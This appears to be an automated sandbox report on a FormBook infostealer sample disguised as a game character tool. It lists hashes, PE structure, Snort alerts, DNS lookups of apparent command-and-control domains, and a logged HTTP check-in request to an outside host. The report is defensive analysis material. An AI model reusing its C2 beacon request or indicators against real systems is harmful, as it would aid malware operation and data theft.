                                                  PI001.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  ORDER 922021.xlsxGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  DutkUUqm2mZl3Fl.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  CAGE8UjZmt.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  xAXTvjBdeI.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Invoice pdf.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  SOA.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Invoice & Packing List..exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  SKMBT 23082021 Ref MT103.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  AS-26496-GO-DADDY-COM-LLCUSPO 56720012359.exeGet hashmaliciousBrowse
                                                  • 107.180.44.148
                                                  re2.armGet hashmaliciousBrowse
                                                  • 192.169.135.20
                                                  XbvAoRKnFm.exeGet hashmaliciousBrowse
                                                  • 72.167.225.156
                                                  STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
                                                  • 184.168.102.151
                                                  Wg1UpQ3DEC.exeGet hashmaliciousBrowse
                                                  • 184.168.131.241
                                                  PO.exeGet hashmaliciousBrowse
                                                  • 184.168.131.241
                                                  2021091400983746_pdf.exeGet hashmaliciousBrowse
                                                  • 184.168.131.241
                                                  CLLKFIJI_(9-13-2021).xlsx.vbsGet hashmaliciousBrowse
                                                  • 148.72.215.196
                                                  Kopie dokladu o transakci_14_09_2021.exeGet hashmaliciousBrowse
                                                  • 166.62.10.136
                                                  G2aS9Rd9ys.exeGet hashmaliciousBrowse
                                                  • 148.66.136.188
                                                  Terw9bPuiD.exeGet hashmaliciousBrowse
                                                  • 72.167.225.156
                                                  UPDATED E-STATEMENT.exeGet hashmaliciousBrowse
                                                  • 184.168.102.151
                                                  prueba23.exeGet hashmaliciousBrowse
                                                  • 184.168.131.241
                                                  prueba22.exeGet hashmaliciousBrowse
                                                  • 184.168.131.241
                                                  fIlUUmpx1U.exeGet hashmaliciousBrowse
                                                  • 72.167.225.156
                                                  QUOTATION.exeGet hashmaliciousBrowse
                                                  • 184.168.102.151
                                                  setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                  • 72.167.225.156
                                                  Bill of Quantity & RFQ Specification Project form No Tender #100015520.exeGet hashmaliciousBrowse
                                                  • 64.202.184.79
                                                  recibo de pago.pdf.exeGet hashmaliciousBrowse
                                                  • 107.180.26.74
                                                  docReceipt090921988.exeGet hashmaliciousBrowse
                                                  • 72.167.85.63
                                                  SQUARESPACEUSQMc4nO4xZi.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  SdzD3TeTHx.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  prueba23.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  prueba22.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Order 45789011.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  DHL Arrival Parcel.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Wire Payment Instruction Copy.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  DHL-AWB 9245125956.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  franke-sourcing-000990000.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Wire Payment Instruction Copy.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  DHL Shipping INV#BL.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Purchase Order.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  QUOTATION TABULATION REQUEST FORM.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  PI001.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  ORDER 922021.xlsxGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  DutkUUqm2mZl3Fl.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  CAGE8UjZmt.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  xAXTvjBdeI.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  Invoice pdf.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144
                                                  SOA.exeGet hashmaliciousBrowse
                                                  • 198.185.159.144

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\arrival notice.exe.log
                                                  Process:C:\Users\user\Desktop\arrival notice.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.433485623086771
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:arrival notice.exe
                                                  File size:677376
                                                  MD5:692c22c9579ce47100a87e90f911b202
                                                  SHA1:29189325967d4716883edabb4c03a5a30d836896
                                                  SHA256:3f383c683795d277510e0fb4c806ae17bfb33dd6ff875b66c159068e58c28818
                                                  SHA512:98c6759ef92a350f570dd74b2c53d0307d1c8cf0f4b875ba5d2bb13f11e4bd39ef329b2131f45a18f7d48fdd24c2ab3c65370d71efe9f6975d4b3a4428419887
                                                  SSDEEP:12288:C/WHCM2K4CiI/yzQs2TaIpIFVEclUDbZ9mbHxbUVO/vCI:Ct3C3MIpIFVEj/cHxbUV8qI
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Aa..............0......n......2.... ... ....@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:f1f0f4d0eecccc71

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4a0532
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x61418E12 [Wed Sep 15 06:09:22 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa04e00x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x6b90.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x9e5380x9e600False0.816068653808data7.50720151133IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xa20000x6b900x6c00False0.442672164352data5.09389272572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xaa0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0xa22000x668data
                                                  RT_ICON0xa28780x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1953594267, next used block 28725
                                                  RT_ICON0xa2b700x128GLS_BINARY_LSB_FIRST
                                                  RT_ICON0xa2ca80xea8data
                                                  RT_ICON0xa3b600x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                  RT_ICON0xa44180x568GLS_BINARY_LSB_FIRST
                                                  RT_ICON0xa49900x25a8data
                                                  RT_ICON0xa6f480x10a8data
                                                  RT_ICON0xa80000x468GLS_BINARY_LSB_FIRST
                                                  RT_GROUP_ICON0xa84780x84data
                                                  RT_VERSION0xa850c0x484data
                                                  RT_MANIFEST0xa89a00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Version Infos

                                                  DescriptionData
                                                  Translation0x0000 0x04b0
                                                  LegalCopyrightCopyright 2008 - 2010
                                                  Assembly Version1.3.0.0
                                                  InternalNameIsolatedStora.exe
                                                  FileVersion1.3.0.0
                                                  CompanyNameWHC
                                                  LegalTrademarks
                                                  CommentsA little Tool where you can check the stats of your RYL - Risk Your Life - characters. Ruins of War version.
                                                  ProductNameRYL Character Tool - RoW EU version
                                                  ProductVersion1.3.0.0
                                                  FileDescriptionRYL Character Tool - RoW EU version
                                                  OriginalFilenameIsolatedStora.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  09/15/21-09:24:30.204516TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.6217.160.0.150
                                                  09/15/21-09:24:30.204516TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.6217.160.0.150
                                                  09/15/21-09:24:30.204516TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981980192.168.2.6217.160.0.150

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 15, 2021 09:24:20.978029013 CEST4981480192.168.2.6184.168.131.241
                                                  Sep 15, 2021 09:24:23.977657080 CEST4981480192.168.2.6184.168.131.241
                                                  Sep 15, 2021 09:24:24.153096914 CEST8049814184.168.131.241192.168.2.6
                                                  Sep 15, 2021 09:24:24.153218031 CEST4981480192.168.2.6184.168.131.241
                                                  Sep 15, 2021 09:24:24.153644085 CEST4981480192.168.2.6184.168.131.241
                                                  Sep 15, 2021 09:24:24.664411068 CEST4981480192.168.2.6184.168.131.241
                                                  Sep 15, 2021 09:24:24.838397026 CEST8049814184.168.131.241192.168.2.6
                                                  Sep 15, 2021 09:24:27.149013996 CEST4981480192.168.2.6184.168.131.241
                                                  Sep 15, 2021 09:24:27.362761974 CEST8049814184.168.131.241192.168.2.6
                                                  Sep 15, 2021 09:24:27.392560959 CEST8049814184.168.131.241192.168.2.6
                                                  Sep 15, 2021 09:24:27.392647982 CEST4981480192.168.2.6184.168.131.241
                                                  Sep 15, 2021 09:24:30.183413029 CEST4981980192.168.2.6217.160.0.150
                                                  Sep 15, 2021 09:24:30.204268932 CEST8049819217.160.0.150192.168.2.6
                                                  Sep 15, 2021 09:24:30.204380989 CEST4981980192.168.2.6217.160.0.150
                                                  Sep 15, 2021 09:24:30.204515934 CEST4981980192.168.2.6217.160.0.150
                                                  Sep 15, 2021 09:24:30.227926016 CEST8049819217.160.0.150192.168.2.6
                                                  Sep 15, 2021 09:24:30.234213114 CEST8049819217.160.0.150192.168.2.6
                                                  Sep 15, 2021 09:24:30.234240055 CEST8049819217.160.0.150192.168.2.6
                                                  Sep 15, 2021 09:24:30.234448910 CEST4981980192.168.2.6217.160.0.150
                                                  Sep 15, 2021 09:24:30.234494925 CEST4981980192.168.2.6217.160.0.150
                                                  Sep 15, 2021 09:24:30.258228064 CEST8049819217.160.0.150192.168.2.6
                                                  Sep 15, 2021 09:24:35.329396963 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.478332043 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.478674889 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.478707075 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.635021925 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.636576891 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.636601925 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.636615992 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.636656046 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.636814117 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.637007952 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.638533115 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.641799927 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.642426968 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.642482042 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.644004107 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.646670103 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.646696091 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.646720886 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.646724939 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.646732092 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.646734953 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.797035933 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.797113895 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.800461054 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.800587893 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.800609112 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.800626993 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.800637960 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.800678015 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.800694942 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.800709963 CEST8049820198.185.159.144192.168.2.6
                                                  Sep 15, 2021 09:24:35.800775051 CEST4982080192.168.2.6198.185.159.144
                                                  Sep 15, 2021 09:24:35.800836086 CEST4982080192.168.2.6198.185.159.144

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 15, 2021 09:22:33.316401005 CEST6426753192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:22:33.342964888 CEST53642678.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:04.219773054 CEST4944853192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:04.256767035 CEST53494488.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:26.339293957 CEST6034253192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:26.519601107 CEST53603428.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:28.191821098 CEST6134653192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:28.243772984 CEST53613468.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:29.005805969 CEST5177453192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:29.056723118 CEST53517748.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:29.539859056 CEST5602353192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:29.619518042 CEST53560238.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:30.072652102 CEST5838453192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:30.118606091 CEST53583848.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:30.232294083 CEST6026153192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:30.259624004 CEST53602618.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:30.814652920 CEST5606153192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:30.856642962 CEST53560618.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:31.412506104 CEST5833653192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:31.442188978 CEST53583368.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:32.189654112 CEST5378153192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:32.226582050 CEST53537818.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:32.999929905 CEST5406453192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:33.054893017 CEST53540648.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:38.142790079 CEST5281153192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:38.181746006 CEST53528118.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:38.906277895 CEST5529953192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:38.949270010 CEST53552998.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:46.572726965 CEST6374553192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:46.600931883 CEST53637458.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:02.476913929 CEST5005553192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:02.538595915 CEST53500558.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:15.846744061 CEST6137453192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:15.922352076 CEST53613748.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:20.934240103 CEST5033953192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:20.973491907 CEST53503398.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:24.779668093 CEST6330753192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:24.812320948 CEST53633078.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:26.417874098 CEST4969453192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:26.460546017 CEST53496948.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:30.120132923 CEST5498253192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:30.182477951 CEST53549828.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:35.288491964 CEST5001053192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:35.321568966 CEST53500108.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:40.655951977 CEST6371853192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:40.695703983 CEST53637188.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:45.699867010 CEST6211653192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:45.739990950 CEST53621168.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:50.808604002 CEST6381653192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:51.033142090 CEST53638168.8.8.8192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Sep 15, 2021 09:24:15.846744061 CEST192.168.2.68.8.8.80x2edaStandard query (0)www.petrosterzis.comA (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:20.934240103 CEST192.168.2.68.8.8.80xd18dStandard query (0)www.ilovecoventry.comA (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:30.120132923 CEST192.168.2.68.8.8.80x204eStandard query (0)www.beerenhunger.infoA (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:35.288491964 CEST192.168.2.68.8.8.80xc010Standard query (0)www.singisa4letterword.comA (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:40.655951977 CEST192.168.2.68.8.8.80xed90Standard query (0)www.mybenefits51.comA (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:45.699867010 CEST192.168.2.68.8.8.80x2234Standard query (0)www.aboutacoffee.comA (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:50.808604002 CEST192.168.2.68.8.8.80x1993Standard query (0)www.ifbrick.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Sep 15, 2021 09:24:15.922352076 CEST8.8.8.8192.168.2.60x2edaServer failure (2)www.petrosterzis.comnonenoneA (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:20.973491907 CEST8.8.8.8192.168.2.60xd18dNo error (0)www.ilovecoventry.comilovecoventry.comCNAME (Canonical name)IN (0x0001)
                                                  Sep 15, 2021 09:24:20.973491907 CEST8.8.8.8192.168.2.60xd18dNo error (0)ilovecoventry.com184.168.131.241A (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:30.182477951 CEST8.8.8.8192.168.2.60x204eNo error (0)www.beerenhunger.info217.160.0.150A (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:35.321568966 CEST8.8.8.8192.168.2.60xc010No error (0)www.singisa4letterword.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                  Sep 15, 2021 09:24:35.321568966 CEST8.8.8.8192.168.2.60xc010No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:35.321568966 CEST8.8.8.8192.168.2.60xc010No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:35.321568966 CEST8.8.8.8192.168.2.60xc010No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:35.321568966 CEST8.8.8.8192.168.2.60xc010No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:40.695703983 CEST8.8.8.8192.168.2.60xed90Name error (3)www.mybenefits51.comnonenoneA (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:45.739990950 CEST8.8.8.8192.168.2.60x2234No error (0)www.aboutacoffee.com104.21.85.192A (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:45.739990950 CEST8.8.8.8192.168.2.60x2234No error (0)www.aboutacoffee.com172.67.209.141A (IP address)IN (0x0001)
                                                  Sep 15, 2021 09:24:51.033142090 CEST8.8.8.8192.168.2.60x1993No error (0)www.ifbrick.com165.73.84.33A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.ilovecoventry.com
                                                  • www.beerenhunger.info
                                                  • www.singisa4letterword.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.649814184.168.131.24180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Sep 15, 2021 09:24:24.153644085 CEST7755OUTGET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1
                                                  Host: www.ilovecoventry.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
